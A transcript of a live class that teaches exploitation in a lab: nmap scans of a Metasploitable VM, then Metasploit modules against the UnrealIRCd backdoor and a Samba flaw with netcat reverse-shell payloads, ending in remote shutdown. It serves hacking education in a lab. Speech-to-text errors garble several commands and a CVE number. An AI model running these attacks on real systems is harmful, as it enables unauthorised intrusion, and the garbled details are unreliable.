conference will now be recorded.
So please confirm me, am I audible or not?
You're audible, sir.
Uh, Today I'll repeat the same thing yesterday what I have done, the practical one. So those who have not succeeded in this practical, so I'll give you some 5-10 minutes time. Repeat the same command and follow the rules what I'm going to run in this Kali Linux machine. Okay, so first what you have to do is you have to identify which is your IP address of the Kali and what is the IP address of the Metasploit. Okay, so I'm going to take a Metasploit IP address here. So type if config and press enter key. And right now in this case, the IP address is 192.168.1.0.130. So this is the IP address. And here start ping space 192.168.0.130 and press enter key. So check is at 130 or some other number. 192.168.0.130. 192.168.0.130, and before that check if config. Okay, now this is comes under 0.1.145. Okay, then this IP address, it's not perfect IP address for Metasploit. So again you run if config once again. So still what you do is one more time you restart the machine, then we'll check this not connected to the 1.0 network. So Kali Linux machine is connected to 1.0 network like 192.168.1.45. But here we'll try to check once again what is the IP address of this Metasploitable. MSF admin, MSF admin. Then if config, and look at this. Now I'm getting 192.168.1.50. So I would recommend you to start again ping command, ping space hyphen c to 192.168.1.50 and press enter key. So now it's working now. So after this network communication, you have to start attacking the machine. Okay, first, so before attacking, what you have to do is you have to test the network port first. Okay, so what you have to do, you have to start 1.50. It's not going to take a copy paste. we have to work here. So type clear, you type nmap space hyphen s small letter capital letter s 192.168.1.50. Press enter. Okay, now system is asking root privileges. Then you type the same thing, sudo nmap space hyphen s capital letter s 192.168.1.50. Press enter. Then type Kali, enter. So this is the list of port number here. Then once it is done, then again uh, type clear. Next you type nmap, sorry, sudo space nmap space small letter s, capital letter s, small letter s, capital letter V, then hyphen p 6667 hyphen hyphen script vuln 192.168.1.50 and press enter key. So it's running the script now. So I have this version 6667 TCP port IRC. Version is Unreal IRCD. Then what should I take? Again sudo space nmap space hyphen capital letter O. Then you type 192.168.1.50 and press enter key. So now I got that OS operating system details. So from here onwards, we will check our main point like so search Unreal IRC and press enter key. But make ensure is that opened MSF console or not. Before you search in this IRCL, okay, do not type blindly whatever the command already have given. So what you have to do is you have to start and type very first you have to type MSF console and press enter key. Then from here onwards you can start ping command, nmap command, everything you can run this. Okay. So once again I'll repeat ping hyphen c to 192.168.1.50 and press enter key. Then next I have sudo nmap hyphen s capital letter s 192.168.1.50 and press enter key. Okay, next again I have to type what is the port number details. Sudo map small letter s capital letter s small letter s capital letter v, v for version, okay, hyphen p 6667 192.168 1.50 and press enter key. And this is a version what Unreal IRCD. So now I have to search OS details sudo space nmap space hyphen o capital letter 192.168.1.50 press enter. So when you get this OS details, then you start nmap space hyphen s capital letter S hyphen s capital letter V hyphen p 6667 hyphen script vuln vulnerable 192.168.1.50 enter. Okay. Then enter sudo. So from here onwards, you have to start after checking the port vulnerabilities. Okay, and this is the one what I was checking, backdoor. Okay, for every command you have to check what the information are you getting here. Okay, then you have to search for unreal IRC, enter, and you can see what and all uh, informations you have here. Okay, so this is the information, what is the name of this area, and also the ranking state. It's an excellent. Okay, so now I'm going to make use of this, do copy and search for information, type info space, look at this. So now the system is going on. Okay, and press enter key here. So now we get the complete information here, so that you can see what is the root port is been configured, but root r host did not set. R port is been already configured here, like a targeted port. Then I have to use this exploit. Okay, use and exploit, and you press enter key. So you don't want to type, just you do copy paste. And as I said in the last class, the prompt automatically gets converted. Okay, you are in backdoor prompt, so please remember where you are in and what has to perform here. Okay, if you make one small mistake here, then it won't come. So okay, now what has to be done here, I have to check what is the status here. So for checking the status, you have to use show options and press enter key, and you can see the complete options like rhost, then rport details. Okay, if you did not set that rhost, then you have to set this. Okay, so type the command set rhost, and what is the IP address of the target, 192.168, then 1.50. This is the one targeted one. Okay, r host means remote host, so don't type your kali IP address. Okay, this must be the targeted metasploitable IP address, and press enter key. Then again you type show options and press enter key, and you can see what is the port number and what is the r host is been configured. So once if you configured, then again I have to check what are the payloads are available, and you type show payloads, and you can see last time as I said, you must take payload cmd unix and reverse is nothing but backdoor, so you have to take the entire control of that machine. So in that case you have to use this. So what you do, just do copy first, then type I wanted to gather some information about this payload. So use info command and you type the name of the payload. Okay, do not take that payload itself. Okay, you must try to take, because it's a payload itself. I am in the command. Okay, so you type only the cmd slash unix slash uni reverse. Okay, then press enter key, then which will give you the list. So in this payload, there is no l host. Okay, you have to set payload l host options. So before you set that ip address, you try to use, so set payload, then try to enter this option. Okay, press enter key. Now this has been configured, and you type show options. Okay, and press enter key. Look at that ip address of the l host. It's not been configured here. Okay, I guess most of the times you will be stuck in this set payload itself. Okay, so if you're not set the payload and ip address, then it's going to be a problem. Okay, now the thing is, sir, here l host, what is the ip address to be entered? Okay, so l host is your local host. Okay, so what is your local host ip address of the Kali that you have to configure? Suppose in this case, sir, I don't know what is my ip address. Then you type if config and you try to check what is the ip address of your Kali. Okay, and what you have to do is you take set l host space 192.168.1.45. So this is my l host. Okay, this is your l host is your Kali, r host is your Metasploit or targeted machine, and press enter key. Now this has been configured. Again, how do I reconfirm that? You type show options and press enter key, that you can see 192.168.1.45. So now everything is been configured. R host has been configured, L host has been configured, and port number automatically gets updated. Now, now the thing is, last area we have to exploit. Okay, type exploit itself and press enter key. So now it is going to be connected, and you have to notice the authentication and see the socket A and B, and look at this command shell session 1 is opened, and check out this IP address. So what is this 1.45 and 1.50? 1.45 is your Kali Linux machine, and 1.50 is your Metasploitable machine. Okay, from where to where you are connecting. So that details in front of your screen, you have the complete information. But blindly don't assume and do not type the mistake commands. Okay, understand what you are going to perform here. Then once if you get that session one text or notification, you try to use host name, because it's already you have hacked the machine, and you are trying to access from the back door. So type host name, so you will get to know about what is your computer name of what you hacked. Okay, then similarly you try to type what is a pwd, then you type date, so on so on. Okay, so from the same machine, if I want to access and reboot the machine, so right now this is not rebooting here. Wait a minute. So machine is working. Okay, now system is working here. I'm not putting any commands to power off, but I'm starting from the Kali Linux machine. So type power off itself and press enter key, and wait for a minute and check in the right hand side your Metasploitable is shutting down. Hope you all understood. You ask me if you have any doubts. So in your WhatsApp group, I'm sending the same script. You start again and let me know the status. Yesterday, so some people you have tried and not get successes. Again, I would like, request you to perform one more time. So like Gayatri, Kavya, Mridula, then Hiba, Richila. So try once. I'll give 10 minutes time just to focus and start working on that. But before you establish uh, Kali Linux and Metasploit, first you check network status of these two machines, which network it is. Then you start with MSF console. So make it fast. Share me the screen, or if whenever you get a error or problem something, then I will try to resolve it and start making your practical here itself. Then I'll start with a new one more new practical other than this.
Sir, for which one do we use the Kali Linux IP address? Like in the R host
What,
roast?
whatever you connected, that you check the IP address of your Kalima. In
Right.
your
I know.
machine,
Like, do I put it in the roast set roast and then the Kali Linux IP address?
R host is for Metasploit, L host is for Kali,
Oh, L host. All right, sir. Okay, sir.
local. R means remote.
Right. Oh, all right. Okay, sir.
Yeah. Okay, finish the assignment. 5 minutes will come back.
Sure, I did till the exploit thing, but it's just loading. It's not showing anything. Like it showed a couple of things and then it just stopped. It said command shell session one opened.
Arshita, you were telling something. I was not in this.
Yes, the after the exploit thing,
Hmm.
like a few things came and it says command shell session one opened, but
Good.
after that it's like that typing
Type
thing is not coming.
type host name.
Host,
Type the command
like should I
host name.
type the word host name?
Yeah. Just you share me the screen. I will tell you. Did you hack that machine or not? Hmm. Yeah. Type host name without space. Enter. Now where you are in? You are in Metasploitable. Type pwd. See this? etc unreal. Got it? Then type ls. Hmm. Then you create one file, something like you are hacked, something like that. What is the command that day I told, right? Create a file and you type some information in that. Okay, or else what you do is type power off itself directly. So type power off and you check the machine is going to turn off or not. Press enter key. Check in the right hand side that metasploitable machine. What is the stages? See, are you controlling the machine or not? That's all. Good. What about Hiba, Gayatri, Kavya, Mridula, Tanisha, Richla? What's your status? Okay, so again we will start our one more new practical. Type msf admin, then clear, and you type if config, press enter key, and this is the same IP address. So open Kali, you type msf console first. So now when you are in this prompt, so type 1.50. So try to check the network status. So it's working now. Then you run once stealth scan and version scan. So 1.50. Something, yeah. Got nmap space hyphen yes, small letter s, capital letter s, capital letter V, 192.168, 1.50. Then asking root privileges, sudo, then paste it, Kali, enter. So I'm trying to gather this version and this stealth scan information. So it takes time, so we have to wait. Yeah, so now in this case, I'm getting Samba something Apache server. Yeah, so this is the one I'm looking for in this example. Samba SM Samba SMDB 3.x. So something like this you have. This is the one I'm targeting now. So we have two things. Okay. Uh, Go to this area, then you search for this area. Okay. So now what should I do is open for Firefox. You type google.com. In the google.com, you type what is it? Samba SMDB. Okay. So I'm taking this one CVE number and look at this. This is the number I have. Okay. national vulnerability, and you can see the CVE score number also. These are the latest one. Okay, so now I'll come back to our main screen. Okay, I'll be search CVE hyphen 2007 hyphen 2774 and press enter key. This is actually CVE number or CVE ID, and check that what is the result you have here. Okay, and you can see the exploit ranking state is excellent. Okay, and you can see that exploit information. Okay, and this is your CVE number here. Okay, so now what I have to do is I have to use this exploit. Then how do I use this? So there itself you have this option here. Okay, so I'm going to copy this. Okay, then you type command use and press enter key. Look at this. So directly I'm inside this area. Okay, but in place of use command, you can take info also, information. No problem. Okay. So once when you set this, when the prompt is open like this, you have to try to check what is the options. Okay, you type show options and enter. So when you press enter key, see the information. So now lhost is already, it's been configured here. So 1.45. Okay, but look at this. rhost is not configured. lhost is already, it's been configured. 1.45. Okay, now we have to set rhost. So type set rhost. It means it's a remote host. So what was the IP address? As I said, the IP address is 1.50 192.168, sorry, 192.168.1.50, and press enter. Now this rhost has been configured. Next you check the payloads what you have. So you type command as show payloads and press enter key. So from here try to check what is the reverse option you have available here. Okay, so little bit you go up, you can see there will be a lot of things. Okay, I'm trying to take one. You have via TCP, you have Python, you have so many options you have. Okay, I'm going to take NetCat. I will be taking. So this is the one I'm trying to take. Payload Unix reverse NetCat. Okay, and here also you have OpenSSL. Okay, you can use any one of this. You try whenever you have free time, one by one, one by one, one by one. Okay, for our demonstration purpose, I'll be taking only one thing. Okay, so first you set the payload. So scroll down. So set the payload. Press enter key. So now look at this. this has been connected, means payload has been configured, and inside the payload you type show options. Okay, so type show options, enter, and check what you have, L port and L host. Okay, so in this case, what's your Kali Linux machine? Is that same or not? You check once. So if not, you have to set this command. So that is the most important. But it's been automatically configured. But sometimes if that not configured, then you have to set this. Okay, type if config. Okay, so I'm going to take one of the example. What is that? 1.45. Press enter key and check what is the IP address you have. 1.45. Okay. Suppose if not, then what you have to do? You have to type set L host. Okay, and IP address 192.168.1.45. So you have to use the same IP address. Okay, 1.45, and it's been configured. If not configured, then you have to enter. Okay, understood, right? So just you press enter key and again set what is the next port you have, L port. So L port 4 times 4, quad 4. Okay, that you can see in the up itself. So see to that. If not configured, then you have to configure. Then again you type show options and press enter key, and these two will get updated in this current settings. Okay, so once it has been configured, then it is ready to launch the attacks. So what is the final step? It is exploit and press enter. So start reverse TCP handler and look at this. Session 1 is opened. Then you type again host name and look at this and PWD. Okay, then next you check LS. Okay, then you type power off and you check in the right hand side, it's automatically shutting down. So now I will share you the same commands in the WhatsApp. So check the practical number 2 and start finishing the practical now itself. Is it done? Harshita, Kavya, Mridula, Gayatri, Riya. Okay, so conduct the practical for practical 2 and let me know the status. Okay, so take your own time, watch the today's video and execute the same way and let me know the result for next class. So see you all, meet you in the next class.
Thank you, sir.